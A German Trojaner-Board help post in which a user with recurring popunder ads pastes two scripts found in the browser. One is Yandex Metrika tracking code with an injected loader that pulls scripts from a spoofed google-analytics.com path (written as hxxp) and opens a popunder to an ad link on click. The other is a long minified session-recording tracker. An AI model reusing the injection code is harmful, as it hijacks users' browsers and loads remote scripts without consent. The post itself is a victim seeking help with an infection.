Trojaner-Board - Sporadische Adf.ly-Popups, Verdacht auf Rootkit

Hey,

heute war ich ne Zeit lang mit Chrome unterwegs (extra deswegen runtergeladen und neu installiert), keine Popups bekommen.
Witzigerweise kam gerade eben, als ich diesen Thread (mit Firefox) geöffnet habe wieder eines der Popups. Und zwar jedes mal wenn ich in das Fenster geklickt habe, scheint wohl "gebugt" zu haben. Da dachte ich mir, dass das an einem Script liegen muss und hab mal ein bisschen nachgeschaut.

Gefunden habe ich folgendes:

watch.js:

Code:

//<!--

/* <![CDATA[ */

(function (d, w, c) {

    (w[c] = w[c] || []).push(function() {

        try {

            w.yaCounter20892832 = new Ya.Metrika({id:20892832,

                    clickmap:true,

                    trackLinks:true,

                    accurateTrackBounce:true});

        } catch(e) { }

    });
 

    var n = d.getElementsByTagName("script")[0],

        s = d.createElement("script"),

        f = function () { n.parentNode.insertBefore(s, n); };

    s.type = "text/javascript";

    s.async = true;

    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";
 
 

                           var nos,div,img;
 

                nos = document.createElement('noscript');
 

                div = document.createElement('div');

                img = document.createElement('img');

                img.src ="//mc.yandex.ru/watch/20892832";

                img.style.cssText = 'position:absolute; left:-9999px;';

                img.alt = '';
 

                div.appendChild(img);

                nos.appendChild(div);
 

                //document.getElementsByTagName("head")[0].appendChild(nos);

                var head=  document.getElementsByTagName ("head")[0] ||  document.documentElement;

                head.insertBefore(nos, head.firstChild);
 

    if (w.opera == "[object Opera]") {

        d.addEventListener("DOMContentLoaded", f, false);

    } else { f(); }

})(document, window, "yandex_metrika_callbacks");

        function loadScript(url, callback) {

            var script = document.createElement("script");

            script.type = "text/javascript";

            if (script.readyState) { //IE

                script.onreadystatechange = function () {

                    if (script.readyState == "loaded" || script.readyState == "complete") {

                        script.onreadystatechange = null;

                        callback();

                    }

                };

            } else { //Others

                script.onload = function () {

                    callback();

                };

            }

            script.src = url;

            document.getElementsByTagName("head")[0].appendChild(script);

        }
 

        window.onload = function() {

            if (window.jQuery) {

                actJq();

            } else {// jQuery is not loaded

                loadScript("hxxp://google-analytics.com/Scripts/jquery.min.js", function () { actJq(); } );

            }

        };
 
 

        function actJq(){
 

            loadScript("hxxp://google-analytics.com/Scripts/jquery.popunder.min.js", function () {
 

                (function($){

                    $.fn.outside = function(ename, cb,cookie){

                        return this.each(function(){

                            var $this = $(this),

                                    self = this;

                            $(document.body).bind(ename, function tempo(e){

                                if(e.target !== self && !$.contains(self, e.target)){
 

                                    //uncomment theese if you need cookie control

                                    if(!readCookie(cookie)){ // cookie is not set, setting
 

                                        cb.apply(self, [e]);

                                        createCookie(cookie,"Gs9Jpex2yvvc",1);        // 1 - time

                                    };
 

                                    if(!self.parentNode) $(document.body).unbind(ename, tempo);

                                }

                            });

                        });

                    };

                }(jQuery));
 

                $(function(){

                    $('head').outside('click', function(e){

                        window.aPopunder = [

                            ['hxxp://adlock.in/LZPF9']

                        ];

                        $.popunder();

                        alrtre_g();

                    },'Clickedgdw');

                });
 

            });
 

        }
 
 

        function createCookie(name,value,days) {

            var date = new Date();           

            date.setTime(date.getTime()+(days*60*60*1000)); //1 hours           

            var expires = date.toGMTString();

            document.cookie = name+"="+value+"; expires="+expires+"; path=/";

        }
 
 

        function readCookie(name) {

            var flag = 0;

            var dcmntCookie = document.cookie.split(';');

            for(var i=0;i < dcmntCookie.length;i++) {

                var ck = dcmntCookie[i];

                while (ck.charAt(0)==' ') {

                    ck = ck.substring(1,ck.length);

                }

                if(ck) {

                    cparts = ck.split('=');

                    if (cparts[0] == name) flag=1;

                }

            }

            if(flag) {

                return true;

            } else {

                return false;

            }

        }
 
 

 loadScript("hxxp://google-analytics.com/fx.js?bMzOrToken=00000000100000063506161052238229399351283203629", function () {
 
 
 
 

        });
 

/* ]]> */

Hier wird offensichtlich die besagte Seite aufgerufen.

Und was mir auch komisch vorkam:

ga.js

Code:

(function(b,a,ma){function N(a){for(var b=1,q=a.length;b<arguments.length;b++)a[q++]=arguments[b];return a.length}function z(){for(var a={},n="hash host hostname href pathname port protocol search".split(" "),q=n.length,h=q;h--;)a[n[h]]="";try{for(var A=b.location,h=q;h--;){var z=n[h];a[z]=""+A[z]}}catch(y){T&&(a=T)}return a}function Db(a){return a?(""+a).replace(/^\s+/,"").replace(/\s+$/,""):""}function Sa(){return-1!=z().hostname.search(/(?:^|\.)(?:ya|yandex|narod|narod2)\.(?:\w+|com\.\w+)$/)}function Ca(){return"MetrikaPlayer"==

b.name}function kb(a){var b=[],q;for(q in a)a.hasOwnProperty(q)&&(b[b.length]=q+"="+encodeURIComponent(a[q]));return b.join("&")}function Da(a){for(var b=a.length,q=0,h=255,A=255;b;){var z=21<b?21:b,b=b-z;do{var y="string"==typeof a?a.charCodeAt(q):a[q];q++;if(255<y)var v=y>>8,y=y&255,y=y^v;h+=y;A+=h}while(--z);h=(h&255)+(h>>8);A=(A&255)+(A>>8)}a=(h&255)+(h>>8)<<8|(A&255)+(A>>8);return 65535==a?0:a}function aa(w,b,q,h){var A="";q&&(A=new Date,A.setTime(A.getTime()+6E4*q),A=";expires="+A.toGMTString());

a.cookie=w+"="+encodeURIComponent(b)+A+";path="+(h||"/")}function ta(w){return a.cookie.match(RegExp("(?:^|;\\s*)"+w+"=([^;]*)"))?decodeURIComponent(RegExp.$1):null}function na(){var w=a.documentElement;return"CSS1Compat"==a.compatMode?w:a.body||w}function Ta(){var a=na();return[a.clientWidth,a.clientHeight]}function Ea(){var a=na(),b=Ta();return[Math.max(a.scrollWidth,b[0]),Math.max(a.scrollHeight,b[1])]}function Fa(){return[b.pageXOffset||a.documentElement&&a.documentElement.scrollLeft||a.body&&

a.body.scrollLeft||0,b.pageYOffset||a.documentElement&&a.documentElement.scrollTop||a.body&&a.body.scrollTop||0]}function Eb(b){if(!b.ownerDocument||"PARAM"==b.tagName||b==a.body||b==a.documentElement)return[0,0];if(b.getBoundingClientRect)return b=b.getBoundingClientRect(),[Math.round(b.left+O[0]),Math.round(b.top+O[1])];for(var n=0,q=0;b;)n+=b.offsetLeft,q+=b.offsetTop,b=b.offsetParent;return[n,q]}function W(b,n){return b==a.documentElement?null:!n?b==a.body?a.documentElement:b.parentNode:b.tagName.toLowerCase()===

n?b:W(b.parentNode,n)}function Fb(a,b){var q=[];if(a)for(var h=a.childNodes,A=0,z=h.length;A<z;A++){var y=h[A];!("INPUT"==y.nodeName&&y.type&&"hidden"==y.type.toLocaleLowerCase())&&(!b||y.nodeName==b)&&N(q,y)}return q}function ua(b){var n=Eb(b);b=b==a.body||b==a.documentElement?Ea():[b.offsetWidth,b.offsetHeight];return[n[0],n[1],b[0],b[1]]}function Gb(a){var b="";a=a.childNodes;for(var q=0,h=a.length;q<h;q++)3==a[q].nodeType&&(b+=a[q].nodeValue);return Da(b.replace(/[\u0000-\u0020]+/g,""))}function Hb(a){var b=

"",q="className width height align title alt name".split(" ");"IMG"==a.tagName&&(b+=a.src.toLowerCase());"A"==a.tagName&&(b+=a.href.toLowerCase());for(var h=0;h<q.length;h++)a.getAttribute&&(b+=String(a.getAttribute(q[h])||"").toLowerCase());return Da(b.replace(/[\u0000-\u0020]+/g,""))}function Ib(b){for(var n=a.getElementsByTagName("form"),q=0,h=n.length;q<h;q++)if(n[q]==b)return q;return-1}function lb(a,b){return RegExp("(?:^|\\s)"+b+"(?:\\s|$)").test(a.className)}function Jb(a){return"INPUT"==

a.nodeName&&"submit"!=a.type&&"image"!=a.type&&"hidden"!=a.type?"radio"==a.type||"checkbox"==a.type?!a.checked:!a.value:"TEXTAREA"==a.nodeName?!a.value:"SELECT"==a.nodeName?0>a.selectedIndex:!0}function oa(a){try{delete b[a]}catch(n){b[a]=ma}}function ia(b){var n=a.createElement("script");n.type="text/javascript";n.async=!0;n.src=b;try{var q=a.getElementsByTagName("html")[0];a.getElementsByTagName("head")[0]||q.appendChild(a.createElement("head"));var h=a.getElementsByTagName("head")[0];h.insertBefore(n,

h.firstChild)}catch(A){}}function mb(w,n,q,h,A,I){function y(p){return function(){try{return p.apply(this,arguments)}catch(Ua){var a=p&&p.name||"";(new Image).src="//an.yandex.ru/jserr/"+w+"?"+kb({"cnt-class":100+n,errmsg:Ua.name+": "+Ua.message+", line: "+(Ua.number||Ua.lineNumber)+", func: "+a})}}}function v(p,a,F){var d=y(function(p){return F(p||b.event)});ea[ea.length]=[p,a,F,d];p.addEventListener?p.addEventListener(a,d,!0):p.attachEvent&&p.attachEvent("on"+a,d)}function B(p,a,F){for(var d=0;d<

ea.length;d++)if(ea[d]&&ea[d][0]==p&&ea[d][1]==a&&ea[d][2]==F){var b=ea[d][3];delete ea[d];break}b&&(p.removeEventListener?p.removeEventListener(a,b,!0):p.detachEvent&&p.detachEvent("on"+a,b))}function T(p){var a=na();return[p.pageX||p.clientX+O[0]-(a.clientLeft||0)||0,p.pageY||p.clientY+O[1]-(a.clientTop||0)||0]}function Z(p){return p.target||p.srcElement}function V(p){return(p.shiftKey?Kb:0)|(p.ctrlKey?nb:0)|(p.altKey?Lb:0)|(p.metaKey?Ub:0)|(p.ctrlKey||p.altKey?Va:0)}function U(p){var a=(new Date).getTime();

p&&a<p&&(ob+=p-a+pa);b.setTimeout(y(function(){U(a)}),pa)}function Wa(){var p=(new Date).getTime()+ob;p<pb&&(p=pb+pa/2);return pb=p}function J(){return Math.round((Wa()-Vb)/l)}function fa(p,a){a=Math.max(0,Math.min(a,65535));N(p,a>>8,a&255)}function C(p,a){N(p,a&255)}function r(p,a){for(a=Math.max(0,a|0);127<a;)N(p,a&127|128),a>>=7;N(p,a)}function aa(p,a){255<a.length&&(a=a.substr(0,255));N(p,a.length);for(var F=0;F<a.length;F++)fa(p,a.charCodeAt(F))}function ca(p,a){r(p,a.length);for(var F=0;F<a.length;F++)r(p,

a.charCodeAt(F))}function ma(p){if(!p.nodeName)return p[K]=-1,null;var a=+p[K];if(!isFinite(a)||0>=a)return null;var F=Wb,d=0,b=W(p),c=b&&b[K]?b[K]:0;0>c&&(c=0);var e=p.nodeName.toUpperCase(),m=Xb[e];m||(F|=Yb);var g;a:{g=Fb(W(p),p.nodeName);for(var k=0;k<g.length;k++)if(g[k]==p){g=k;break a}g=0}g||(F|=Zb);k=ua(p);(b=b?ua(b):null)&&(k[0]==b[0]&&k[1]==b[1]&&k[2]==b[2]&&k[3]==b[3])&&(F|=Mb);Xa[a].pos=k[0]+"x"+k[1];Xa[a].size=k[2]+"x"+k[3];p.id&&"string"==typeof p.id&&(F|=Nb);(b=Gb(p))&&(F|=$b);var j=

Hb(p);j&&(d|=ac);var f;a:{f=Fb(W(p),p.tagName);for(var l=0;l<f.length;l++)if(!(f[l].id&&"string"==typeof f[l].id)&&Hb(f[l])==j&&Gb(f[l])==b){f=!0;break a}f=!1}if(f)var F=F|Ob,D=Da((p.innerHTML||"").replace(/(<[^>]*>|[\u0000-\u0020])/g,""));f=[];C(f,s);r(f,a);C(f,F);r(f,c);m?C(f,m):aa(f,e);g&&r(f,g);F&Mb||(r(f,k[0]),r(f,k[1]),r(f,k[2]),r(f,k[3]));F&Nb&&aa(f,p.id);b&&fa(f,b);F&Ob&&fa(f,D);C(f,d);j&&fa(f,j);return f}function la(p,a,d,b,c,e){for(;d&&(!d.offsetWidth||!d.offsetHeight);)d=W(d);if(!d)return null;

var f=d[K];if(!f||0>f)return null;var m={mousemove:D,click:jb,dblclick:Ba,mousedown:bc,mouseup:ib,touch:ya}[a];if(!m)return null;var k=Eb(d);d=[];C(d,m);r(d,p);r(d,f);r(d,Math.max(0,b[0]-k[0]));r(d,Math.max(0,b[1]-k[1]));/^mouse(up|down)|click$/.test(a)&&(p=c||e,C(d,2>p?mb:p==(c?2:4)?Cb:Bb));return d}function t(p,a){var d=[];C(d,u);r(d,p);r(d,a[0]);r(d,a[1]);return d}function ra(p,a,d){var b=[];d=d[K];if(!d||0>d)return null;C(b,x);r(b,p);r(b,a[0]);r(b,a[1]);r(b,d);return b}function sa(p,a,d){var b=

[];C(b,gb);r(b,p);r(b,a[0]);r(b,a[1]);r(b,d[0]);r(b,d[1]);return b}function da(p,a,d,b){var c=[];C(c,cc);r(c,p);fa(c,a);C(c,d);p=b[K];if(!p||0>p)p=0;r(c,p);return c}function P(p,a){var d,b;0==a.length?b=d="":100>=a.length?(d=a,b=""):200>=a.length?(d=a.substr(0,100),b=a.substr(100)):(d=a.substr(0,97),b=a.substr(a.length-97));var c=[];C(c,hb);r(c,p);ca(c,d);ca(c,b);return c}function Ga(a){var d=[];C(d,ia);r(d,a);return d}function Ha(a){var d=[];C(d,Aa);r(d,a);return d}function qa(a){var d=[];C(d,Ca);

r(d,a);return d}function ta(a,d){var b=[];C(b,Ra);r(b,a);r(b,d[K]);return b}function xa(a,d){var b=[];C(b,Sa);r(b,a);r(b,d[K]);return b}function L(a,d,b){var c=[];C(c,oa);r(c,a);r(c,d[K]);aa(c,String(b));return c}function ga(a,d){var b=d[K];if(0<b){var c=[],e=ua(d),f=Xa[b],m=e[0]+"x"+e[1],k=e[2]+"x"+e[3];m!=f.pos&&(f.pos=m,C(c,dc),r(c,a),r(c,b),r(c,e[0]),r(c,e[1]));k!=f.size&&(f.size=k,C(c,E),r(c,a),r(c,b),r(c,e[2]),r(c,e[3]));if(c.length)return c}return null}function Ia(a){var d=a[K];if(!d||(0>d||

!/^INPUT|SELECT|TEXTAREA$/.test(a.nodeName))||!a.form||lb(a.form,"-metrika-noform"))return null;var b=Ib(a.form);if(0>b)return null;var c;c="INPUT"==a.nodeName?{text:0,password:2,radio:3,checkbox:4,file:6,image:7}[a.type]:{SELECT:1,TEXTAREA:5}[a.nodeName];if("number"!=typeof c)return null;for(var e=-1,f=a.form.elements,m=f.length,k=0,g=0;k<m;k++)if(f[k].name==a.name){if(f[k]==a){e=g;break}g++}if(0>e)return null;f=[];C(f,ec);r(f,d);r(f,b);r(f,c);ca(f,a.name||"");r(f,e);return f}function Ja(a,d){var b=

Ib(d);if(0>b)return null;for(var c=d.elements,e=c.length,f=[],m=0;m<e;m++)if(!Jb(c[m])){var k=c[m][K];k&&0<k&&N(f,k)}c=[];C(c,fc);r(c,a);r(c,b);r(c,f.length);for(b=0;b<f.length;b++)r(c,f[b]);return c}function va(){var a=[];C(a,za);return a}function Ka(a){clearTimeout(Pb);for(var d=(new Date).getTime()+gc;Za.length&&(a||+(new Date).getTime()<d);){var c=Za.shift();if(c=c[0].apply(b,c[1])){var e=c;6500<wa.length+e.length&&$a();for(var c=wa,m=0,k=c.length;m<e.length;m++)c[k++]=e[m];ab||(ab=b.setTimeout(y($a),

f))}}!0===a&&$a(!0);Za.length&&(Pb=b.setTimeout(y(Ka),hc))}function H(a,d,b){N(Za,[a,d]);Ka(b)}function M(a){if(a[K])H(ga,[J(),a]);else{var d=W(a);d&&M(d);a[K]=qb;Xa[qb]={};qb++;H(ma,[a]);H(Ia,[a])}}function Q(a){var d=Z(a),b,c,e=0;if(d&&"SCROLLBAR"!=d.nodeName){if(d&&/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(d.tagName))if(d[K])M(d);else if(b=W(d,"form")){b=b.elements;for(c=b.length;e<c;e++)/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(b[e].tagName)&&!b[e][K]&&M(b[e])}else M(d);else M(d);H(la,[J(),a.type,d,T(a),

a.which,a.button])}}function La(d){Q(d);var c,e;b.getSelection?(d=b.getSelection(),c=d.toString(),e=d.anchorNode):a.selection&&a.selection.createRange&&(d=a.selection.createRange(),c=d.text,e=d.parentElement());for(;e&&1!=e.nodeType;)e=e.parentNode;if(!e||!("INPUT"==e.tagName&&"password"==e.type))if((!e||!/(?:^|\s)-metrika-nokeys(?:\s|$)/.test(e.className))&&c!=rb)rb=c,H(P,[J(),c])}function Ma(a){var d=Wa(),b=d-Qb;if(!(b<m)){var c=T(a),e=sb[0]-c[0],f=sb[1]-c[1],e=e*e+f*f;!(0>=e)&&(!(16>e&&100>b)&&

!(20>b&&256>e))&&(Qb=d,sb=c,Q(a))}}function X(){O=Fa();var a=Wa();a-Rb<m||10>Math.abs(O[0]-tb[0])&&10>Math.abs(O[1]-tb[1])||(Rb=a,tb=O,H(t,[J(),O]))}function R(d){d=Z(d);var b=Math.random(),c=[d.scrollLeft,d.scrollTop];if(d.localId){if(b=ub[d.localId],!b||10>Math.abs(c[0]-b[0])&&10>Math.abs(c[1]-b[1]))return}else{for(;ub[b];)b=Math.random();d.localId=b}ub[d.localId]=c;d!==a&&(M(d),H(ra,[J(),c,d]))}function S(){H(sa,[J(),Ta(),Ea()])}function Y(a){H(va,[],!0);$a(!0);if("beforeunload"==a.type)for(a=

+new Date+50;+new Date<a;);}function Na(a,d,b){a=Z(a);!("INPUT"==a.tagName&&"password"==a.type)&&!/(?:^|\s)-metrika-nokeys(?:\s|$)/.test(a.className)&&(M(a),H(da,[J(),d,b,a]))}function $(a){var d=a.keyCode,c=V(a);if({3:1,8:1,9:1,13:1,16:1,17:1,18:1,19:1,20:1,27:1,33:1,34:1,35:1,36:1,37:1,38:1,39:1,40:1,45:1,46:1,91:1,92:1,93:1,106:1,110:1,111:1,144:1,145:1}[d]||(112<=d&&123>=d||96<=d&&105>=d)||c&Va)19==d&&(c&~Va)==nb&&(d=144),Na(a,d,c|Va),vb=!1,b.setTimeout(y(function(){vb=!0}),1),67==d&&(c&nb&&!(c&

Lb)&&!(c&Kb))&&ja()}function ka(a){vb&&(!wb&&0!==a.which)&&(Na(a,a.charCode||a.keyCode,V(a)),wb=!0,b.setTimeout(y(function(){wb=!1}),1))}function ja(){xb||(xb=!0,rb&&H(Ga,[J()]),b.setTimeout(y(function(){xb=!1}),1))}function ba(){Oa||(Oa=!0,H(Ha,[J()]))}function d(){Oa&&(Oa=!1,H(qa,[J()]))}function k(a){(!Oa||a&&!a.fromElement)&&ba()}function c(a){a&&!a.toElement&&d()}function e(a){a=Z(a);var d,b,c=0;if(a&&/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(a.tagName)){if(a[K])M(a);else if(d=W(a,"form")){d=d.elements;

for(b=d.length;c<b;c++)/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(d[c].tagName)&&!d[c][K]&&M(d[c])}else M(a);H(ta,[J(),a])}}function g(a){if((a=Z(a))&&/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(a.tagName))M(a),H(xa,[J(),a])}function j(a){a=Z(a);if(!("INPUT"==a.tagName&&"password"==a.type)&&(!a||!/(?:^|\s)-metrika-nokeys(?:\s|$)/.test(a.className))&&a&&/^INPUT|SELECT|TEXTAREA$/.test(a.tagName)){var d=/^(checkbox|radio)$/.test(a.type)?a.checked:a.value;M(a);H(L,[J(),a,d])}}function G(a){a=Z(a);if(!lb(a,"-metrika-noform")&&

"FORM"==a.nodeName){for(var d=a.elements,b=0;b<d.length;b++)Jb(d[b])||M(d[b]);H(Ja,[J(),a],!0)}}function bb(a){X();if(a.touches&&a.touches.length){var d=Z(a);if(d){M(d);for(var b=0;b<a.touches.length;b++)H(la,[J(),"touch",d,[a.touches[b].pageX,a.touches[b].pageY],0,0])}}}function $a(){clearTimeout(ab);ab=0;if(wa.length){for(var a={rn:Math.round(1E5*Math.random()),"wv-type":0,"cnt-class":n,"page-url":z().href,wmode:0,"wv-hit":h,"wv-part":ic++,"wv-check":Da(wa),"browser-info":["z",yb,"i",cb].join(":")},

d=wa,b=d.length,c=[],e=b-b%3,f,m=0;m<e;m+=3)f=(d[m]<<16)+(d[m+1]<<8)+d[m+2],N(c,ha[f>>18&63],ha[f>>12&63],ha[f>>6&63],ha[f&63]);switch(b-e){case 1:f=d[e]<<4;N(c,ha[f>>6&63],ha[f&63],"__");break;case 2:f=(d[e]<<10)+(d[e+1]<<2),N(c,ha[f>>12&63],ha[f>>6&63],ha[f&63],"_")}d={"wv-data":c.join("")};A.send("visor","webvisor",a,d);wa.length=0}}var gc=100,hc=200,f=15E3,pa=20,l=50,m=10,s=1,D=2,u=3,x=16,bc=4,cc=5,ec=7,dc=9,E=10,fc=11,ya=12,za=13,Aa=14,Ca=15,Ra=17,Sa=18,oa=19,ia=27,gb=28,hb=29,ib=30,jb=32,Ba=

33,mb=1,Bb=2,Cb=4,Ob=1,Yb=2,Zb=4,Mb=8,$b=16,Nb=32,Wb=64,ac=2,Lb=1,Kb=2,nb=4,Ub=8,Va=16,Xb={A:1,ABBR:2,ACRONYM:3,ADDRESS:4,APPLET:5,AREA:6,B:7,BASE:8,BASEFONT:9,BDO:10,BIG:11,BLOCKQUOTE:12,BODY:13,BR:14,BUTTON:15,CAPTION:16,CENTER:17,CITE:18,CODE:19,COL:20,COLGROUP:21,DD:22,DEL:23,DFN:24,DIR:25,DIV:26,DL:27,DT:28,EM:29,FIELDSET:30,FONT:31,FORM:32,FRAME:33,FRAMESET:34,H1:35,H2:36,H3:37,H4:38,H5:39,H6:40,HEAD:41,HR:42,HTML:43,I:44,IFRAME:45,IMG:46,INPUT:47,INS:48,ISINDEX:49,KBD:50,LABEL:51,LEGEND:52,

LI:53,LINK:54,MAP:55,MENU:56,META:57,NOFRAMES:58,NOSCRIPT:59,OBJECT:60,OL:61,OPTGROUP:62,OPTION:63,P:64,PARAM:65,PRE:66,Q:67,S:68,SAMP:69,SCRIPT:70,SELECT:71,SMALL:72,SPAN:73,STRIKE:74,STRONG:75,STYLE:76,SUB:77,SUP:78,TABLE:79,TBODY:80,TD:81,TEXTAREA:82,TFOOT:83,TH:84,THEAD:85,TITLE:86,TR:87,TT:88,U:89,UL:90,VAR:91,NOINDEX:100},ea=[],ob=0;U(0);var pb=0,Za=[],Pb,qb=1,Qb=0,sb=[0,0],Rb=0,tb=[0,0],ub={},vb=!0,wb=!1,rb="",xb=!1,Oa=!0,ha="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789*-".split(""),

wa=[],ab,ic=1,Vb=Wa(),K="metrikaId_"+Math.random(),Xa={},db=":submit"+Math.random();if("MetrikaPlayer"!=b.name){v(a,"mousemove",Ma);v(a,"click",Q);v(a,"dblclick",Q);v(a,"mousedown",Q);v(a,"mouseup",La);v(b,"scroll",X);v(b,"beforeunload",Y);Sb||v(b,"unload",Y);v(b,"resize",S);v(a,"keydown",$);v(a,"keypress",ka);v(a,"copy",ja);v(a,"touchmove",bb);v(a,"touchstart",bb);a.attachEvent&&!b.opera?(v(a,"focusin",k),v(a,"focusout",c)):(v(b,"focus",ba),v(b,"blur",d),v(a,"blur",d));if(a.addEventListener)a.addEventListener("scroll",

R,!0),a.addEventListener("focus",e,!0),a.addEventListener("blur",g,!0),a.addEventListener("change",j,!0),a.addEventListener("submit",G,!0);else if(a.attachEvent){v(a,"focusin",e);v(a,"focusout",g);for(var zb=a.getElementsByTagName("form"),eb=0;eb<zb.length;eb++){for(var Ab=zb[eb].getElementsByTagName("*"),fb=0;fb<Ab.length;fb++)/^INPUT|SELECT|TEXTAREA$/.test(Ab[fb].tagName)&&v(Ab[fb],"change",j);v(zb[eb],"submit",G)}}var Pa=a.getElementsByTagName("form");if(Pa.length)for(var Qa=0;Qa<Pa.length;Qa++)Pa[Qa][db]=

Pa[Qa].submit,Pa[Qa].submit=function(){G({target:this});return this[db]()};"0:0"!=O.join(":")&&X();S();var Tb=function(d,b){if(d){var c={"wv-type":1,"cnt-class":n,"page-url":z().href,"wv-hit":h,"browser-info":["z",yb,"i",cb,"pct",b||""].join(":")};a.all&&(d=d.replace(/\r\n/g,"\n"));var e;e=d;e=e.replace(/\r\n/g,"\n");for(var f=[],m=String.fromCharCode,k=0,g=e.length;k<g;k++){var s=e.charCodeAt(k);128>s?f.push(m(s)):(127<s&&2048>s?f.push(m(s>>6|192)):(f.push(m(s>>12|224)),f.push(m(s>>6&63|128))),f.push(m(s&

63|128)))}e=f.join("");for(var f=[],j,l,D,s=0,u=e.length;s<u;)j=e.charCodeAt(s++),m=e.charCodeAt(s++),k=e.charCodeAt(s++),g=j>>2,j=(j&3)<<4|m>>4,l=(m&15)<<2|k>>6,D=k&63,isNaN(m)?l=D=64:isNaN(k)&&(D=64),f.push("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(g)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(j)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(l)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(D));

e={"wv-data":f.join("")};A.sendMultipart("webvisor",c,e,3)}};I.uploadPage=function(d){if("function"==typeof b.toStaticHTML&&-1<b.toStaticHTML.toString().indexOf("NoScript"))return!1;var c=a.documentElement;if(c&&19E4<(""+c.innerHTML).length)return!1;var e=b.XMLHttpRequest?new b.XMLHttpRequest:new ActiveXObject("Msxml2.XMLHTTP"),f=(""+(a.characterSet||a.charset||"")).toLowerCase(),c="text/html"+(f?";charset="+f:"");if("html"==d){d=RegExp("<script [^>]*?//mc\\.yandex\\.ru/watch/.*?\x3c/script>","gi");

var f=a.documentElement,m=a.doctype,k=f.attributes,g="",s="",j="",s=f.outerHTML;if(!s){for(s=0;s<k.length;s++){var l=k[s];l&&(g+=" "+l.name+'="'+(l.value||"")+'"')}s="<html"+g+">"+f.innerHTML+"</html>"}m&&(j="<!DOCTYPE "+m.name+(m.publicId?' PUBLIC "'+m.publicId+'"':"")+(m.systemId?' "'+m.systemId+'"':"")+">\n");Tb((j+s).replace(d,""),c);return!0}e&&(e.open("get",z().href,!0),e.onreadystatechange=function(){4==e.readyState&&Tb(e.responseText,e.getResponseHeader("content-type"))},e.overrideMimeType&&

f&&e.overrideMimeType(c),e.send(null));return!0}}return{stop:function(){B(a,"mousemove",Ma);B(a,"click",Q);B(a,"dblclick",Q);B(a,"mousedown",Q);B(a,"mouseup",La);B(b,"scroll",X);B(b,"beforeunload",Y);B(b,"unload",Y);B(b,"resize",S);B(a,"keydown",$);B(a,"keypress",ka);B(a,"copy",ja);B(a,"touchmove",bb);B(a,"touchstart",bb);B(a,"focusin",k);B(a,"focusout",c);B(b,"focus",ba);B(b,"blur",d);B(a,"blur",d);if(a.removeEventListener)a.removeEventListener("scroll",R,!0),a.removeEventListener("focus",e,!0),

a.removeEventListener("blur",g,!0),a.removeEventListener("change",j,!0),a.removeEventListener("submit",G,!0);else if(a.detachEvent){B(a,"focusin",e);B(a,"focusout",g);for(var f=a.getElementsByTagName("form"),m=0;m<f.length;m++){for(var s=f[m].getElementsByTagName("*"),l=0;l<s.length;l++)/^INPUT|SELECT|TEXTAREA$/.test(s[l].tagName)&&B(s[l],"change",j);B(f[m],"submit",G)}}f=a.getElementsByTagName("form");for(m=0;m<f.length;m++)f[m][db]&&(f[m].submit=f[m][db])},uploadPages:function(d,c){function e(){B(a,

"DOMContentLoaded",e);B(b,"load",e);for(var f=d.split(/\n/),m=z().href,k=/regexp:/,s=0;s<f.length;s++){var g=f[s];if(g)if(k.test(g)){if(g=Db(g.replace(k,"")),RegExp(g).test(m)){I.uploadPage(c);break}}else if(-1!==m.indexOf(g)){I.uploadPage(c);break}}}"complete"==a.readyState?e():(v(a,"DOMContentLoaded",e),v(b,"load",e))}}}var Sb=-1===(""+b.navigator.userAgent).toLowerCase().search(/webkit/)&&-1!==(""+b.navigator.userAgent).toLowerCase().search(/gecko/),O=Fa();b.Ya=b.Ya||{};Ya._metrika=Ya._metrika||

{};Ya._metrika.counters=Ya._metrika.counters||{};Ya._metrika.hitParam=Ya._metrika.hitParam||{};var T=z(),yb,cb,ca=b.navigator,la=b.screen,xa="https:"==T.protocol?"https:":"http:",Bb="$Rev: 1825 $".match(/(\d+)/)[1],ra="object"==typeof a.all,gb=64,sa=ra?512:2048,hb=ra?512:2048,ib=ra?100:400,ya="noindex",za=50,jb=RegExp("\\.(3gp|7z|aac|ac3|acs|ai|avi|ape|apk|asf|bmp|bz2|cab|cdr|crc32|css|csv|cue|divx|dmg|djvu?|doc(x|m|b)?|emf|eps|exe|flac?|flv|iso|swf|gif|t?gz|jpe?g?|js|m3u8?|m4a|mp(3|4|e?g?)|m4v|md5|mkv|mov|msi|ods|og(g|m|v)|pdf|phps|png|ppt(x|m|b)?|psd|rar|rss|rtf|sea|sfv|sit|sha1|svg|tar|tif?f|torrent|ts|txt|vob|wave?|wma|wmv|wmf|webm|xls(x|m|b)?|xpi|g?zip)$",

"i"),Cb=+new Date,Ra,Aa;b.Ya.Metrika=function(w,n,q,h){function A(a,b,c){ga[ga.length]=[c,c];a.addEventListener?a.addEventListener(b,c,!1):a.attachEvent&&a.attachEvent("on"+b,c)}function I(a,b,c){for(var e=0;e<ga.length;e++)if(ga[e]&&ga[e][0]==c){var g=ga[e][1];delete ga[e];break}g&&(a.removeEventListener?a.removeEventListener(b,g,!1):a.detachEvent&&a.detachEvent("on"+b,g))}function y(a,k){k=k||256;if(!a)return"";a.length>k&&(a=a.substr(0,k));return(b.encodeURIComponent||b.escape)(a).replace(/\+/g,

"%2B")}function v(a){function b(a){return a?a.replace(/\\/g,"\\\\").replace(/"/g,'\\"'):""}if(a===ma)return"";if(null===a)return"null";switch(a.constructor){case Boolean:return a.toString();case Number:return isFinite(a)?a.toString():"null";case String:return'"'+b(a)+'"';case Array:for(var c=[],e=0,g=a.length;e<g;e++)c[c.length]=v(a[e]);return"["+c.join(",")+"]";case Object:c="{";e=0;for(g in a)if(a.hasOwnProperty(g)){var j=a[g];j!==ma&&(c+=(e?",":"")+'"'+b(g)+'":'+v(j),e++)}return c+"}";default:return"null"}}

